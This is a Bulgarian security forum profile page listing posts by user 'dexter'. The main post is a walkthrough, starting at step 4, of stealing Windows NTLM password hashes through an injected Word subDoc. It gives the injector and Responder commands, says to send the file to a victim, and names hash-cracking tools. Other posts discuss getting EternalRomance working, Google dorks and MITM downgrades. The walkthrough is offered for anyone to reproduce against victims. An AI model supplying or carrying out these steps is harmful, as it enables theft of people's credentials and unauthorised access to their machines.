Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

dexter

Потребители
  • Мнения

    8
  • Присъединил/а се

  • Последно посещение

  • Days Won

    1

dexter last won the day on Януари 30

dexter had the most liked content!

Обществена Репутация

6 Neutral

Относно dexter

  • Ранг
    Начинаещ

Последни посетители

Функцията за показване на последните профилни посетители в момента е изключена и не е показна пред останалите потребители.

  1. Здравейте, напоследък много се нашумя покрай откритието на малко известната функция на Microsoft Word, наречена subDoc. Чрез нея компютри с Windows операционни системи могат да дадът достъп до NTLM хешовете на името и паролата на потребителския профил. Вчера си поиграх малко и възпроизведох атаката. Ето и стъпките, през които минах: 4. След като вече имаме всичко необходимо, пристъпваме към създаването на нов "Word" документ с инжектиран “subDoc”. При създаването му трябва да зададем IР адреса на машината/сървъра, който ще играе ролята на listener за входящите SMB хешове. - Командата за това е: [email protected]:~/Scripts/SubDoc$ sudo python subdoc_injector.py -i mydoc.docx -o fake_document.docx -u ///192.168.20.21/subdoctest -d 100 5. Ако случайно ви даде грешка свързана с библиотеките на xmltodict, значи я нямате и трябва да си я инсталирате: - Командата е: [email protected]:~/Scripts/SubDoc$ sudo pip install xmltodict 6. След като вече сме създали докуметът, трябва да свалим и стартираме "Responder" скриптът на машината, която ще приеме SMB request-ите с хешовете. Responder-a може да се свали от този линк: https://github.com/SpiderLabs/Responder *Задължителното при него е, че не тръгва ако не е стартиран като root. - За да го стартираме, изпълняваме следната команда: $ python Responder.py -I eth0 -v Машината започва да слуша за входящи SMB request-и … 7. Изпращаме документът на жертвата и когато тя го отвори, получаваме username, hash на паролата, и IP адрес на машината. 8. След като сме се сдобили вече с hash-а на паролата, следващата стъпка е да я ckrack-нем. За тази цел има много "tool"-ве, като най-известните са "hashcat", "John the Ripper", "RainbowCrack". Надявам се да съм го написал разбираемо, така че всеки да успее да го направи.
  2. dexter

    ETERNALROMANCE/SYNERGY за WINDOWS SERVER 2016

    Eternalblue и ако съм го ползвал успешно, но този ми дава грешка още в началото като го set-вам. Ти пробва ли да го направиш?
  3. dexter

    Google Refine web searches

    Ако някой все още не знае за силата на Google Search, може да я открие в линковете долу: https://support.google.com/websearch/answer/2466433?hl=en&visit_id=1-636377790646629010-3230377300&rd=1 http://www.exploit-db.com/google-dorks/
  4. Случайно попаднах на този материал: https://www.exploit-db.com/docs/42329.pdf Sleepya явно доста разбира от тези неща, и според описанието експлойта може да се използва на всички Windows машини само без Windows 10. Не успях да подкарам експлойтът и се чудя, дали има някой, който е успял да го направи, и ако да, каква е хватката, защото все си мисля, че има нещо, което нарочно не са упоменали.
  5. @Hexagone наскоро гледах, че mtel имат общо 190 събдомейна ... ужас направо
  6. Изцяло зависи от сайта дали използва SSL. Друг е въпроса, че може някой да застане посредата между теб и сайта (MITM) и от HTTPS, връзката да премине към HTTP, което е малко вероятно да забележиш.
×

Important Information

За да посещавате този уебсайт е необходимо да се съгласите с Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.